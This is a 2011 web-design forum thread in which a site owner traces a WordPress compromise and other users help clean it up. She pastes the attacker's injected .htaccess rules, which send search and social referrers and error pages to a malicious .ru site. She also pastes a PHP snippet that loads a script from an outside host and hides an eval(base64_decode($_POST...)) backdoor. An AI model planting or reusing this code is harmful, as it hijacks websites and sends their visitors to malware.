Andrea Posted November 10, 2011 Report Share Posted November 10, 2011 Apparently, at some point I signed my site (see my footer link) up for some sitelock alert, and yesterday, I received a warning email. We have detected a critical malware vulnerability at your site aandbwebdesign.com. This must be corrected within 72 hours in order to maintain your certification and continue to display the SiteLock security badge. Please access your SiteLock dashboard for more details. From your dashboard, you can also take advantage of our Expert Services team to help you correct this issue. Some of the issues were related to a straggle folder that I just deleted, but one warning remains, and I cannot find the source of the issue: Page:http://www.aandbwebdesign.com?=Search&s=1Malware link:http://largeprovider.ru/evoce/index.php?=Search&s=1Malware reported by: Advisory provided by Google If the link labeled "Malware Link" above is a link to an external website (not under your control), you should remove this link as it will send your visitors to a known malware site. If the link is on your site, though, you will need to apply to be removed from google's malware list. You may also click here to get help from our expert services team But I cannot find the issue here - the link isn't really helpful (to me) - how can I find this russian intruder in my files? Quote Link to comment Share on other sites More sharing options...
Andrea Posted November 10, 2011 Author Report Share Posted November 10, 2011 I'm stuck - somehow, laboratory-security.ru has has attached itself to my site, and I can't find where they are hiding. Most the site works fine, but when I hover over 'Blog", I see that link pop up. When I log into my Wordpress admin and try to edit search.php, I get the "reported attach page" warning. But when I open search.php via Dramweaver, I see nothing out of the ordinary. I have even copied all the files to my desktop and ran a dreamweaver search for laboratory - and nothing comes up. Any hints anyone? Quote Link to comment Share on other sites More sharing options...
falkencreative Posted November 10, 2011 Report Share Posted November 10, 2011 It's probably some sort of Javascript based attack. Have you checked for suspicious javascript includes in your main "index.php" file in the root of your site? I'm not seeing anything suspicious that I can spot thought. Quote Link to comment Share on other sites More sharing options...
Andrea Posted November 10, 2011 Author Report Share Posted November 10, 2011 I looked for JavaScripts, but so far, haven't found any that look bad. I assume that url should be in one of those files, but Dreamweaver didn't find anything. What is odd is that at home this AM, when I hovered over 'Blog' in the nav bar, I saw the bad url appear in the bottom left. and when I clicked blog, it loaded the page without CSS. Now here at work, I don't have either of these events occurring. Too weird. Quote Link to comment Share on other sites More sharing options...
newseed Posted November 10, 2011 Report Share Posted November 10, 2011 I looked for JavaScripts, but so far, haven't found any that look bad. I assume that url should be in one of those files, but Dreamweaver didn't find anything. What is odd is that at home this AM, when I hovered over 'Blog' in the nav bar, I saw the bad url appear in the bottom left. and when I clicked blog, it loaded the page without CSS. Now here at work, I don't have either of these events occurring. Too weird. I don't suppose this would have something to do with the wpadmin folder files because (and I am assuming here) you probably don't log in to your site at work but you do at home. Quote Link to comment Share on other sites More sharing options...
Andrea Posted November 10, 2011 Author Report Share Posted November 10, 2011 I don't know - I noticed that URL when I viewed the site in the browser, but I was logged into admin in another tab.... What I also don't understand is that the compromised link that alert gave me is related to the search function - and it's search.php that gets blocked when I try to open it via wp-admin. But when I open it via Dreamweaver, I see nothing suspicious. Of course, I could pay that alert site $60 for help with this problem, but I really don't want to. Quote Link to comment Share on other sites More sharing options...
newseed Posted November 10, 2011 Report Share Posted November 10, 2011 If you didn't do any customization in the wpadmin files such as search.php then why don't you just reupload the original file(s) and see what happens. Quote Link to comment Share on other sites More sharing options...
Andrea Posted November 10, 2011 Author Report Share Posted November 10, 2011 Good point - I'll do that. At least it'll rule out those and maybe even fix the issue. Quote Link to comment Share on other sites More sharing options...
Andrea Posted November 11, 2011 Author Report Share Posted November 11, 2011 I found it! Those dirty, rotten sons of a bitches!!!! They put it in my .htaccess. But I'm not totally sure what all to delete: --- Actually, I'm taking it all out. Please let me know if part of this actually belongs. Also,, - how do they get into my .htaccess??? # BEGIN WordPress <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] </IfModule> # END WordPress ErrorDocument 400 http://spark-plastic.ru/open/index.php ErrorDocument 401 http://spark-plastic.ru/open/index.php ErrorDocument 403 http://spark-plastic.ru/open/index.php ErrorDocument 404 http://spark-plastic.ru/open/index.php ErrorDocument 500 http://spark-plastic.ru/open/index.php <IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER} .*google.* [OR] RewriteCond %{HTTP_REFERER} .*ask.* [OR] RewriteCond %{HTTP_REFERER} .*yahoo.* [OR] RewriteCond %{HTTP_REFERER} .*baidu.* [OR] RewriteCond %{HTTP_REFERER} .*youtube.* [OR] RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR] RewriteCond %{HTTP_REFERER} .*qq.* [OR] RewriteCond %{HTTP_REFERER} .*excite.* [OR] RewriteCond %{HTTP_REFERER} .*altavista.* [OR] RewriteCond %{HTTP_REFERER} .*msn.* [OR] RewriteCond %{HTTP_REFERER} .*netscape.* [OR] RewriteCond %{HTTP_REFERER} .*aol.* [OR] RewriteCond %{HTTP_REFERER} .*hotbot.* [OR] RewriteCond %{HTTP_REFERER} .*goto.* [OR] RewriteCond %{HTTP_REFERER} .*infoseek.* [OR] RewriteCond %{HTTP_REFERER} .*mamma.* [OR] RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR] RewriteCond %{HTTP_REFERER} .*lycos.* [OR] RewriteCond %{HTTP_REFERER} .*search.* [OR] RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR] RewriteCond %{HTTP_REFERER} .*bing.* [OR] RewriteCond %{HTTP_REFERER} .*dogpile.* [OR] RewriteCond %{HTTP_REFERER} .*facebook.* [OR] RewriteCond %{HTTP_REFERER} .*twitter.* [OR] RewriteCond %{HTTP_REFERER} .*blog.* [OR] RewriteCond %{HTTP_REFERER} .*live.* [OR] RewriteCond %{HTTP_REFERER} .*myspace.* [OR] RewriteCond %{HTTP_REFERER} .*mail.* [OR] RewriteCond %{HTTP_REFERER} .*yandex.* [OR] RewriteCond %{HTTP_REFERER} .*rambler.* [OR] RewriteCond %{HTTP_REFERER} .*ya.* [OR] RewriteCond %{HTTP_REFERER} .*aport.* [OR] RewriteCond %{HTTP_REFERER} .*linkedin.* [OR] RewriteCond %{HTTP_REFERER} .*flickr.* RewriteRule ^(.*)$ http://spark-plastic.ru/open/index.php [R=301,L] </IfModule> Quote Link to comment Share on other sites More sharing options...
falkencreative Posted November 11, 2011 Report Share Posted November 11, 2011 Take out everything after the "# END WordPress" line. Everything before that line is valid and needed by Wordpress. I can't really say how they got access... it's possible they got access to the server your site is hosted on, not just your specific account, and added that code to all .htaccess files that they could find. Quote Link to comment Share on other sites More sharing options...
Andrea Posted November 11, 2011 Author Report Share Posted November 11, 2011 This is getting ridiculous - what in the world is going on. So I come home, ready to put the part back into my htaccess that I should have left there (thanks, Ben) when I have another email from the sitelock place about a whole new page that's defective. Click at own risk, but they report: http://www.aandbwebdesign.com/th1s_1s_a_4o4.html the strange thing is, I do not see this file in any of my online directories. Sitelock reports that the malware link is (again, click at own risk) http://masaskisoft.in/ahalai/index.php - so I'm looking through my files and this seems to be in the top of several files (index.php for example): <?php global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} } I don't really understand it, but I do know that turn it up now has NOTHING to do with me or my site. What in the world is happening??? Quote Link to comment Share on other sites More sharing options...
falkencreative Posted November 12, 2011 Report Share Posted November 12, 2011 I'm assuming you've already changed all of your hosting related usernames/passwords? Sounds like this is something you'd better talk to your hosting about. Maybe the server you are hosting your site on has security issues? Quote Link to comment Share on other sites More sharing options...
Andrea Posted November 12, 2011 Author Report Share Posted November 12, 2011 that's the thing - my computer crashed last weekend and I bought a new one, and in the process of recovering stuff and getting things back, I just changed the password a couple days ago - and it' s a good one. But I'm in chat with the host right now - this is too weird. Thanks for your help. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.